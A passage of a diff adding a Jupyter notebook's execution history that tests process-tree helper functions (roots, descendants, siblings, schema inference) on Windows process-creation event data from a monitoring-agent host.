+       "data": {
+        "text/plain": "ProcSchema(process_name='NewProcessName', process_id='NewProcessId', parent_id='ProcessId', logon_id='SubjectLogonId', cmd_line='CommandLine', user_name='SubjectUserName', path_separator='\\\\', time_stamp='TimeGenerated', parent_name='ParentProcessName', target_logon_id='TargetLogonId', user_id='SubjectUserSid')"
+       },
+       "execution_count": 36,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86",
+     "text": "ptutil.infer_schema(p_tree)"
+    },
+    "executionTime": "2019-12-13T20:54:55.961Z"
+   },
+   {
+    "cell": {
+     "executionCount": 37,
+     "executionEventId": "a0ee2963-2942-449f-801d-ca6f6da66ec1",
+     "hasError": false,
+     "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "True"
+       },
+       "execution_count": 37,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86",
+     "text": "ptutil.infer_schema(p_tree) == ptutil.WIN_EVENT_SCH"
+    },
+    "executionTime": "2019-12-13T20:55:12.355Z"
+   },
+   {
+    "cell": {
+     "executionCount": 38,
+     "executionEventId": "6e53f76a-5b0e-4965-89e9-7d12b5293984",
+     "hasError": false,
+     "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "{'Processes': 1010,\n 'RootProcesses': 10,\n 'LeafProcesses': 815,\n 'BranchProcesses': 185,\n 'IsolatedProcesses': 0,\n 'LargestTreeDepth': 7}"
+       },
+       "execution_count": 38,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86",
+     "text": "ptutil.get_summary_info(p_tree)"
+    },
+    "executionTime": "2019-12-13T20:55:41.333Z"
+   },
+   {
+    "cell": {
+     "executionCount": 39,
+     "executionEventId": "3fa00e6d-6635-43ef-ad81-6133d624d9d3",
+     "hasError": false,
+     "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03",
+     "outputs": [],
+     "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86",
+     "text": "summary = ptutil.get_summary_info(p_tree)\nassert summary == {'Processes': 1010,\n 'RootProcesses': 10,\n 'LeafProcesses': 815,\n 'BranchProcesses': 185,\n 'IsolatedProcesses': 0,\n 'LargestTreeDepth': 7}"
+    },
+    "executionTime": "2019-12-13T20:56:25.887Z"
+   },
+   {
+    "cell": {
+     "executionCount": 40,
+     "executionEventId": "b68ceeb2-b813-46f2-bda7-a3b51f139688",
+     "hasError": true,
+     "id": "5610ff3a-83b0-4253-92bb-feba160df533",
+     "outputs": [
+      {
+       "ename": "AssertionError",
+       "evalue": "",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mAssertionError\u001b[0m                            Traceback (most recent call last)",
+        "\u001b[1;32m<ipython-input-40-39947b0c1e1b>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[0;32m     16\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mbuild_process_key\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mbottom_desc\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mbottom_desc\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mname\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m     17\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m---> 18\u001b[1;33m \u001b[1;32massert\u001b[0m \u001b[1;33m(\u001b[0m\u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_root\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mbottom_desc\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mall\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m     19\u001b[0m \u001b[1;31m# ptutil.get_root_tree\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m     20\u001b[0m \u001b[1;31m# ptutil.get_siblings\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;31mAssertionError\u001b[0m: "
+       ]
+      }
+     ],
+     "persistentId": "3961bef2-e361-4a29-8f22-e92096d739a8",
+     "text": "assert len(ptutil.get_roots(p_tree)) == 10\nt_root = ptutil.get_roots(p_tree).iloc[4]\nfull_tree = ptutil.get_descendents(p_tree, t_root)\nassert len(s_tree) == 25\nchildren = ptutil.get_children(p_tree, t_root)\nassert len(children) == 13\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nassert len(ptutil.get_ancestors(p_tree, bottom_desc)) == 3\n\nassert isinstance(ptutil.get_parent(p_tree, bottom_desc), pd.Series)\nassert (ptutil.get_process(p_tree, bottom_desc.name) == bottom_desc).all()\nassert (ptutil.get_process(p_tree, bottom_desc) == bottom_desc).all()\nptutil.build_process_key(bottom_desc) == bottom_desc.name\n\nassert (ptutil.get_root(p_tree, bottom_desc) == t_root).all()\n# ptutil.get_root_tree\n# ptutil.get_siblings\nassert ptutil.get_summary_info(p_tree) == {\n    'Processes': 1010,\n 'RootProcesses': 10,\n 'LeafProcesses': 815,\n 'BranchProcesses': 185,\n 'IsolatedProcesses': 0,\n 'LargestTreeDepth': 7}\n\nassert ptutil.infer_schema(p_tree) == ptutil.WIN_EVENT_SCH"
+    },
+    "executionTime": "2019-12-13T20:57:46.681Z"
+   },
+   {
+    "cell": {
+     "executionCount": 41,
+     "executionEventId": "9940f32a-61b0-4260-822c-f3ae23ce66ec",
+     "hasError": false,
+     "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "TenantId                               52b1ab41-869e-4138-9e40-2a4457f09bf0\nAccount                                                                 NaN\nEventID                                                                4688\nTimeGenerated                                           1970-01-01 00:00:00\nComputer                                                    MSTICAlertsWin1\nSubjectUserSid                                                          NaN\nSubjectUserName                                                         NaN\nSubjectDomainName                                                       NaN\nSubjectLogonId                                                        0x3e7\nNewProcessId                                                          0x864\nNewProcessName            C:\\Program Files\\Microsoft Monitoring Agent\\Ag...\nTokenElevationType                                                      NaN\nProcessId                                                               NaN\nCommandLine                                                             NaN\nParentProcessName                                                       NaN\nTargetLogonId                                                           NaN\nSourceComputerId                                                        NaN\nTimeCreatedUtc                                                          NaT\nEffectiveLogonId                                                      0x3e7\nnew_process_lc            c:\\program files\\microsoft monitoring agent\\ag...\nparent_proc_lc                                                          NaN\nsource_index                                                           1004\nNewProcessId_par                                                        NaN\nEffectiveLogonId_par                                                    NaN\nnew_process_lc_par                                                      NaN\nsource_index_par                                                        NaN\nProcessId_par                                                           NaN\nNewProcessName_par                                                      NaN\nTimeGenerated_orig_par                                                  NaT\nparent_key                                                              NaN\nIsRoot                                                                 True\nIsLeaf                                                                False\nIsBranch                                                              False\npath                                                                   1004\nparent_index                                                            NaN\nName: c:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe0x8641970-01-01 00:00:00.000000, dtype: object"
+       },
+       "execution_count": 41,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86",
+     "text": "ptutil.get_root(p_tree, bottom_desc)"
+    },
+    "executionTime": "2019-12-13T20:58:03.358Z"
+   },
+   {
+    "cell": {
+     "executionCount": 42,
+     "executionEventId": "3e87d93c-7003-4061-8bd2-98a64d0987ce",
+     "hasError": false,
+     "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "TenantId                               52b1ab41-869e-4138-9e40-2a4457f09bf0\nAccount                                                                 NaN\nEventID                                                                4688\nTimeGenerated                                           1970-01-01 00:00:00\nComputer                                                    MSTICAlertsWin1\nSubjectUserSid                                                          NaN\nSubjectUserName                                                         NaN\nSubjectDomainName                                                       NaN\nSubjectLogonId                                                        0x3e7\nNewProcessId                                                          0x864\nNewProcessName            C:\\Program Files\\Microsoft Monitoring Agent\\Ag...\nTokenElevationType                                                      NaN\nProcessId                                                               NaN\nCommandLine                                                             NaN\nParentProcessName                                                       NaN\nTargetLogonId                                                           NaN\nSourceComputerId                                                        NaN\nTimeCreatedUtc                                                          NaT\nEffectiveLogonId                                                      0x3e7\nnew_process_lc            c:\\program files\\microsoft monitoring agent\\ag...\nparent_proc_lc                                                          NaN\nsource_index                                                           1004\nNewProcessId_par                                                        NaN\nEffectiveLogonId_par                                                    NaN\nnew_process_lc_par                                                      NaN\nsource_index_par                                                        NaN\nProcessId_par                                                           NaN\nNewProcessName_par                                                      NaN\nTimeGenerated_orig_par                                                  NaT\nparent_key                                                              NaN\nIsRoot                                                                 True\nIsLeaf                                                                False\nIsBranch                                                              False\npath                                                                   1004\nparent_index                                                            NaN\nName: c:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe0x8641970-01-01 00:00:00.000000, dtype: object"
+       },
+       "execution_count": 42,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c",
+     "text": "t_root"
+    },
+    "executionTime": "2019-12-13T20:58:12.387Z"
+   },
+   {
+    "cell": {
+     "executionCount": 43,
+     "executionEventId": "15c281e8-0c4b-4e46-a5ec-0498e03ac4b2",
+     "hasError": false,
+     "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "TenantId                   True\nAccount                   False\nEventID                    True\nTimeGenerated              True\nComputer                   True\nSubjectUserSid            False\nSubjectUserName           False\nSubjectDomainName         False\nSubjectLogonId             True\nNewProcessId               True\nNewProcessName             True\nTokenElevationType        False\nProcessId                 False\nCommandLine               False\nParentProcessName         False\nTargetLogonId             False\nSourceComputerId          False\nTimeCreatedUtc            False\nEffectiveLogonId           True\nnew_process_lc             True\nparent_proc_lc            False\nsource_index               True\nNewProcessId_par          False\nEffectiveLogonId_par      False\nnew_process_lc_par        False\nsource_index_par          False\nProcessId_par             False\nNewProcessName_par        False\nTimeGenerated_orig_par    False\nparent_key                False\nIsRoot                     True\nIsLeaf                     True\nIsBranch                   True\npath                       True\nparent_index              False\nName: c:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe0x8641970-01-01 00:00:00.000000, dtype: bool"
+       },
+       "execution_count": 43,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86",
+     "text": "ptutil.get_root(p_tree, bottom_desc) == t_root"
+    },
+    "executionTime": "2019-12-13T20:58:31.783Z"
+   },
+   {
+    "cell": {
+     "executionCount": 44,
+     "executionEventId": "35a2f2bf-6474-4b5f-a3b3-d87681d9fb1f",
+     "hasError": false,
+     "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "TenantId                               52b1ab41-869e-4138-9e40-2a4457f09bf0\nAccount                                                                 NaN\nEventID                                                                4688\nTimeGenerated                                           1970-01-01 00:00:00\nComputer                                                    MSTICAlertsWin1\nSubjectUserSid                                                          NaN\nSubjectUserName                                                         NaN\nSubjectDomainName                                                       NaN\nSubjectLogonId                                                        0x3e7\nNewProcessId                                                          0x864\nNewProcessName            C:\\Program Files\\Microsoft Monitoring Agent\\Ag...\nTokenElevationType                                                      NaN\nProcessId                                                               NaN\nCommandLine                                                             NaN\nParentProcessName                                                       NaN\nTargetLogonId                                                           NaN\nSourceComputerId                                                        NaN\nTimeCreatedUtc                                                          NaT\nEffectiveLogonId                                                      0x3e7\nnew_process_lc            c:\\program files\\microsoft monitoring agent\\ag...\nparent_proc_lc                                                          NaN\nsource_index                                                           1004\nNewProcessId_par                                                        NaN\nEffectiveLogonId_par                                                    NaN\nnew_process_lc_par                                                      NaN\nsource_index_par                                                        NaN\nProcessId_par                                                           NaN\nNewProcessName_par                                                      NaN\nTimeGenerated_orig_par                                                  NaT\nparent_key                                                              NaN\nIsRoot                                                                 True\nIsLeaf                                                                False\nIsBranch                                                              False\npath                                                                   1004\nparent_index                                                            NaN\nName: c:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe0x8641970-01-01 00:00:00.000000, dtype: object"
+       },
+       "execution_count": 44,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86",
+     "text": "ptutil.get_root(p_tree, bottom_desc)"
+    },
+    "executionTime": "2019-12-13T20:59:11.228Z"
+   },
+   {
+    "cell": {
+     "executionCount": 45,
+     "executionEventId": "5a7c93b8-3551-4d8d-a096-381948ec6594",
+     "hasError": false,
+     "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "TenantId                   True\nAccount                   False\nEventID                    True\nTimeGenerated              True\nComputer                   True\nSubjectUserSid            False\nSubjectUserName           False\nSubjectDomainName         False\nSubjectLogonId             True\nNewProcessId               True\nNewProcessName             True\nTokenElevationType        False\nProcessId                 False\nCommandLine               False\nParentProcessName         False\nTargetLogonId             False\nSourceComputerId          False\nTimeCreatedUtc            False\nEffectiveLogonId           True\nnew_process_lc             True\nparent_proc_lc            False\nsource_index               True\nNewProcessId_par          False\nEffectiveLogonId_par      False\nnew_process_lc_par        False\nsource_index_par          False\nProcessId_par             False\nNewProcessName_par        False\nTimeGenerated_orig_par    False\nparent_key                False\nIsRoot                     True\nIsLeaf                     True\nIsBranch                   True\npath                       True\nparent_index              False\nName: c:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe0x8641970-01-01 00:00:00.000000, dtype: bool"
+       },
+       "execution_count": 45,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86",
+     "text": "ptutil.get_root(p_tree, bottom_desc) == t_root"
+    },
+    "executionTime": "2019-12-13T20:59:45.260Z"
+   },
+   {
+    "cell": {
+     "executionCount": 46,
+     "executionEventId": "5ebabd78-fe99-4997-8ade-39852e294e6a",
+     "hasError": false,
+     "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "TenantId            True\nEventID             True\nTimeGenerated       True\nComputer            True\nSubjectLogonId      True\nNewProcessId        True\nNewProcessName      True\nEffectiveLogonId    True\nnew_process_lc      True\nsource_index        True\nIsRoot              True\nIsLeaf              True\nIsBranch            True\npath                True\nName: c:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe0x8641970-01-01 00:00:00.000000, dtype: bool"
+       },
+       "execution_count": 46,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86",
+     "text": "ptutil.get_root(p_tree, bottom_desc).dropna() == t_root.dropna()"
+    },
+    "executionTime": "2019-12-13T21:00:08.333Z"
+   },
+   {
+    "cell": {
+     "executionCount": 47,
+     "executionEventId": "2543c638-99aa-4a74-86b7-67dcbbcd9be4",
+     "hasError": false,
+     "id": "2c485fe9-3cc5-44f9-b3bf-c0826e063f03",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "True"
+       },
+       "execution_count": 47,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "b48c12d7-ba5f-4042-a7d2-406ef13ffd86",
+     "text": "(ptutil.get_root(p_tree, bottom_desc).dropna() == t_root.dropna()).all()"
+    },
+    "executionTime": "2019-12-13T21:00:53.067Z"
+   },
+   {
+    "cell": {
+     "executionCount": 48,
+     "executionEventId": "088d7f83-23b6-4f7a-930e-f5e8ac441bf4",
+     "hasError": false,
+     "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7",
+     "outputs": [
+      {
+       "data": {
+        "text/html": "<div>\n<style scoped>\n    .dataframe tbody tr th:only-of-type {\n        vertical-align: middle;\n    }\n\n    .dataframe tbody tr th {\n        vertical-align: top;\n    }\n\n    .dataframe thead th {\n        text-align: right;\n    }\n</style>\n<table border=\"1\" class=\"dataframe\">\n  <thead>\n    <tr style=\"text-align: right;\">\n      <th></th>\n      <th>TenantId</th>\n      <th>Account</th>\n      <th>EventID</th>\n      <th>TimeGenerated</th>\n      <th>Computer</th>\n      <th>SubjectUserSid</th>\n      <th>SubjectUserName</th>\n      <th>SubjectDomainName</th>\n      <th>SubjectLogonId</th>\n      <th>NewProcessId</th>\n      <th>...</th>\n      <th>source_index_par</th>\n      <th>ProcessId_par</th>\n      <th>NewProcessName_par</th>\n      <th>TimeGenerated_orig_par</th>\n      <th>parent_key</th>\n      <th>IsRoot</th>\n      <th>IsLeaf</th>\n      <th>IsBranch</th>\n      <th>path</th>\n      <th>parent_index</th>\n    </tr>\n    <tr>\n      <th>proc_key</th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n    </tr>\n  </thead>\n  <tbody>\n    <tr>\n      <th>c:\\windows\\system32\\conhost.exe0x183c2019-02-09 21:02:56.273000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 21:02:56.273</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x183c</td>\n      <td>...</td>\n      <td>998.0</td>\n      <td>0x864</td>\n      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n      <td>2019-02-09 21:02:56.256999936</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>True</td>\n      <td>False</td>\n      <td>1004/10/11</td>\n      <td>10</td>\n    </tr>\n  </tbody>\n</table>\n<p>1 rows × 35 columns</p>\n</div>",
+        "text/plain": "                                                                                TenantId  \\\nproc_key                                                                                   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \n\n                                                                       Account  \\\nproc_key                                                                         \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...  WORKGROUP\\MSTICAlertsWin1$   \n\n                                                    EventID  \\\nproc_key                                                      \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...     4688   \n\n                                                             TimeGenerated  \\\nproc_key                                                                     \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 2019-02-09 21:02:56.273   \n\n                                                           Computer  \\\nproc_key                                                              \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...  MSTICAlertsWin1   \n\n                                                   SubjectUserSid  \\\nproc_key                                                            \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...       S-1-5-18   \n\n                                                     SubjectUserName  \\\nproc_key                                                               \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...  MSTICAlertsWin1$   \n\n                                                   SubjectDomainName  \\\nproc_key                                                               \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...         WORKGROUP   \n\n                                                   SubjectLogonId  \\\nproc_key                                                            \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...          0x3e7   \n\n                                                   NewProcessId  ...  \\\nproc_key                                                         ...   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...       0x183c  ...   \n\n                                                   source_index_par  \\\nproc_key                                                              \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...            998.0   \n\n                                                   ProcessId_par  \\\nproc_key                                                           \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...         0x864   \n\n                                                                                   NewProcessName_par  \\\nproc_key                                                                                                \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...  C:\\Program Files\\Microsoft Monitoring Agent\\Ag...   \n\n                                                          TimeGenerated_orig_par  \\\nproc_key                                                                           \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 2019-02-09 21:02:56.256999936   \n\n                                                                                           parent_key  \\\nproc_key                                                                                                \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...  c:\\program files\\microsoft monitoring agent\\ag...   \n\n                                                   IsRoot IsLeaf IsBranch  \\\nproc_key                                                                    \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...  False   True    False   \n\n                                                          path parent_index  \nproc_key                                                                     \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...  1004/10/11           10  \n\n[1 rows x 35 columns]"
+       },
+       "execution_count": 48,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c",
+     "text": "ptutil.get_siblings(p_tree, bottom_desc)"
+    },
+    "executionTime": "2019-12-13T21:01:29.966Z"
+   },
+   {
+    "cell": {
+     "executionCount": 49,
+     "executionEventId": "cfe798e2-efc3-4509-a90e-628a44174886",
+     "hasError": false,
+     "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7",
+     "outputs": [
+      {
+       "data": {
+        "text/html": "<div>\n<style scoped>\n    .dataframe tbody tr th:only-of-type {\n        vertical-align: middle;\n    }\n\n    .dataframe tbody tr th {\n        vertical-align: top;\n    }\n\n    .dataframe thead th {\n        text-align: right;\n    }\n</style>\n<table border=\"1\" class=\"dataframe\">\n  <thead>\n    <tr style=\"text-align: right;\">\n      <th></th>\n      <th>TenantId</th>\n      <th>Account</th>\n      <th>EventID</th>\n      <th>TimeGenerated</th>\n      <th>Computer</th>\n      <th>SubjectUserSid</th>\n      <th>SubjectUserName</th>\n      <th>SubjectDomainName</th>\n      <th>SubjectLogonId</th>\n      <th>NewProcessId</th>\n      <th>...</th>\n      <th>source_index_par</th>\n      <th>ProcessId_par</th>\n      <th>NewProcessName_par</th>\n      <th>TimeGenerated_orig_par</th>\n      <th>parent_key</th>\n      <th>IsRoot</th>\n      <th>IsLeaf</th>\n      <th>IsBranch</th>\n      <th>path</th>\n      <th>parent_index</th>\n    </tr>\n    <tr>\n      <th>proc_key</th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n    </tr>\n  </thead>\n  <tbody>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x15c82019-02-09 20:32:56.260000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 20:32:56.260</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x15c8</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/5</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xcd82019-02-09 20:52:56.260000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 20:52:56.260</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xcd8</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/8</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x8dc2019-02-09 21:02:56.257000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 21:02:56.257</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x8dc</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/10</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xbd02019-02-09 21:32:56.270000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 21:32:56.270</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xbd0</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/15</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xe342019-02-09 22:02:56.263000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 22:02:56.263</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xe34</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/67</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x53c2019-02-09 22:32:56.247000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 22:32:56.247</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x53c</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/76</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xef42019-02-09 22:32:56.260000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 22:32:56.260</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xef4</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/78</td>\n      <td>1004</td>\n    </tr>\n    